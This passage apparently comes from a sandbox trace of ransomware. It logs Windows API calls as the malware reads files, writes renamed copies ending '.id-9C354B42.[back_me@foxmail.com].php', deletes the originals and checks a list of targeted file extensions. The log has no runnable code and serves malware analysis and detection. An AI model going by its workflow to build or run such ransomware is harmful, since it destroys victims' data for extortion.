Shared\\Stationery\\OrangeCircles.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.916] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\OrangeCircles.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orangecircles.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.917] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=232) returned 1 [0044.917] CloseHandle (hObject=0x1b0) returned 1 [0044.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm")) returned 0x20 [0044.917] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.917] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.918] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=5115) returned 1 [0044.918] CloseHandle (hObject=0x1b0) returned 1 [0044.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg")) returned 0x20 [0044.918] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.918] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.918] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=3981) returned 1 [0044.918] CloseHandle (hObject=0x1b0) returned 1 [0044.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg")) returned 0x20 [0044.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pine_Lumber.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pine_lumber.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.919] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=5115) returned 1 [0044.919] CloseHandle (hObject=0x1b0) returned 1 [0044.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg")) returned 0x20 [0044.919] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.919] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Pretty_Peacock.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\pretty_peacock.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.920] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=14049) returned 1 [0044.920] CloseHandle (hObject=0x1b0) returned 1 [0044.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg")) returned 0x20 [0044.920] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.920] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Psychedelic.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\psychedelic.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.921] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=233) returned 1 [0044.921] CloseHandle (hObject=0x1b0) returned 1 [0044.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm")) returned 0x20 [0044.921] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.921] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.922] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=1920) returned 1 [0044.922] CloseHandle (hObject=0x1b0) returned 1 [0044.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg")) returned 0x20 [0044.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.923] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Roses.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\roses.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.923] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=15776) returned 1 [0044.923] CloseHandle (hObject=0x1b0) returned 1 [0044.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg")) returned 0x20 [0044.923] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.923] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.924] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=37316) returned 1 [0044.924] CloseHandle (hObject=0x1b0) returned 1 [0044.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf")) returned 0x20 [0044.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.924] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=237) returned 1 [0044.924] CloseHandle (hObject=0x1b0) returned 1 [0044.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm")) returned 0x20 [0044.924] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0044.924] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0045.678] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.678] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.678] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.680] GetLastError () returned 0x0 [0045.680] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x621, lpOverlapped=0x0) returned 1 [0045.682] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x630, lpOverlapped=0x0) returned 1 [0045.683] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.683] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xea, lpOverlapped=0x0) returned 1 [0045.683] SetEndOfFile (hFile=0x1c0) returned 1 [0045.683] CloseHandle (hObject=0x1c0) returned 1 [0045.683] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.683] SetEndOfFile (hFile=0x1b0) returned 1 [0045.684] CloseHandle (hObject=0x1b0) returned 1 [0045.684] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0045.684] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\preview.gif")) returned 1 [0045.684] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.684] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.684] lstrlenW (lpString=".doc") returned 4 [0045.684] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.684] lstrlenW (lpString=".docx") returned 5 [0045.685] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.685] lstrlenW (lpString=".pdf") returned 4 [0045.685] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.685] lstrlenW (lpString=".xls") returned 4 [0045.685] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.685] lstrlenW (lpString=".xlsx") returned 5 [0045.685] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.685] lstrlenW (lpString=".ppt") returned 4 [0045.685] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.685] lstrlenW (lpString=".zip") returned 4 [0045.685] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.685] lstrlenW (lpString=".rar") returned 4 [0045.685] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.685] lstrlenW (lpString=".bz2") returned 4 [0045.685] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.685] lstrlenW (lpString=".7z") returned 3 [0045.685] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.685] lstrlenW (lpString=".dbf") returned 4 [0045.685] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.685] lstrlenW (lpString=".1cd") returned 4 [0045.685] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.685] lstrlenW (lpString=".jpg") returned 4 [0045.685] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.685] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.685] lstrlenW (lpString=".doc") returned 4 [0045.685] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0045.685] lstrlenW (lpString=".docx") returned 5 [0045.685] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0045.685] lstrlenW (lpString=".pdf") returned 4 [0045.686] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0045.686] lstrlenW (lpString=".xls") returned 4 [0045.686] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0045.686] lstrlenW (lpString=".xlsx") returned 5 [0045.686] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0045.686] lstrlenW (lpString=".ppt") returned 4 [0045.686] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0045.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.686] lstrlenW (lpString=".zip") returned 4 [0045.686] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0045.686] lstrlenW (lpString=".rar") returned 4 [0045.686] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0045.686] lstrlenW (lpString=".bz2") returned 4 [0045.686] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0045.686] lstrlenW (lpString=".7z") returned 3 [0045.686] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0045.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.686] lstrlenW (lpString=".dbf") returned 4 [0045.686] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0045.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.686] lstrlenW (lpString=".1cd") returned 4 [0045.686] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0045.686] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF") returned 76 [0045.686] lstrlenW (lpString=".jpg") returned 4 [0045.686] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0045.686] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0045.686] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0045.686] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0045.687] GetFileSizeEx (in: hFile=0x1b0, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=25234) returned 1 [0045.687] CloseHandle (hObject=0x1b0) returned 1 [0045.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 0x20 [0045.687] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0045.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0045.688] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.688] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.688] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0045.688] GetLastError () returned 0x0 [0045.688] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x6292, lpOverlapped=0x0) returned 1 [0045.690] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x62a0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x62a0, lpOverlapped=0x0) returned 1 [0045.693] ReadFile (in: hFile=0x1b0, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0045.693] WriteFile (in: hFile=0x1c0, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xec, lpOverlapped=0x0) returned 1 [0045.693] SetEndOfFile (hFile=0x1c0) returned 1 [0045.694] CloseHandle (hObject=0x1c0) returned 1 [0045.694] SetFilePointerEx (in: hFile=0x1b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0045.694] SetEndOfFile (hFile=0x1b0) returned 1 [0045.695] CloseHandle (hObject=0x1b0) returned 1 [0045.695] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0045.695] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\thmbnail.png")) returned 1 [0045.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.695] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.695] lstrlenW (lpString=".doc") returned 4 [0045.695] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.696] lstrlenW (lpString=".docx") returned 5 [0045.696] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.696] lstrlenW (lpString=".pdf") returned 4 [0045.696] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.696] lstrlenW (lpString=".xls") returned 4 [0045.696] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.696] lstrlenW (lpString=".xlsx") returned 5 [0045.696] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.696] lstrlenW (lpString=".ppt") returned 4 [0045.696] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.696] lstrlenW (lpString=".zip") returned 4 [0045.696] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.696] lstrlenW (lpString=".rar") returned 4 [0045.696] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.696] lstrlenW (lpString=".bz2") returned 4 [0045.696] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.696] lstrlenW (lpString=".7z") returned 3 [0045.696] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.696] lstrlenW (lpString=".dbf") returned 4 [0045.696] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.696] lstrlenW (lpString=".1cd") returned 4 [0045.696] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0045.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.696] lstrlenW (lpString=".jpg") returned 4 [0045.696] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0045.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.696] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.696] lstrlenW (lpString=".doc") returned 4 [0045.696] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0045.696] lstrlenW (lpString=".docx") returned 5 [0045.696] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0045.697] lstrlenW (lpString=".pdf") returned 4 [0045.697] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0045.697] lstrlenW (lpString=".xls") returned 4 [0045.697] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0045.697] lstrlenW (lpString=".xlsx") returned 5 [0045.697] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0045.697] lstrlenW (lpString=".ppt") returned 4 [0045.697] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0045.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.697] lstrlenW (lpString=".zip") returned 4 [0045.697] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0045.697] lstrlenW (lpString=".rar") returned 4 [0045.697] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0045.697] lstrlenW (lpString=".bz2") returned 4 [0045.697] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0045.697] lstrlenW (lpString=".7z") returned 3 [0045.697] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0045.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.697] lstrlenW (lpString=".dbf") returned 4 [0045.697] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0045.697] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\THMBNAIL.PNG") returned 77 [0045.697] lstrlenW (lpString=".1cd") returned 4 [0045.697] lstrcmpiW (lpString1=".1cd", 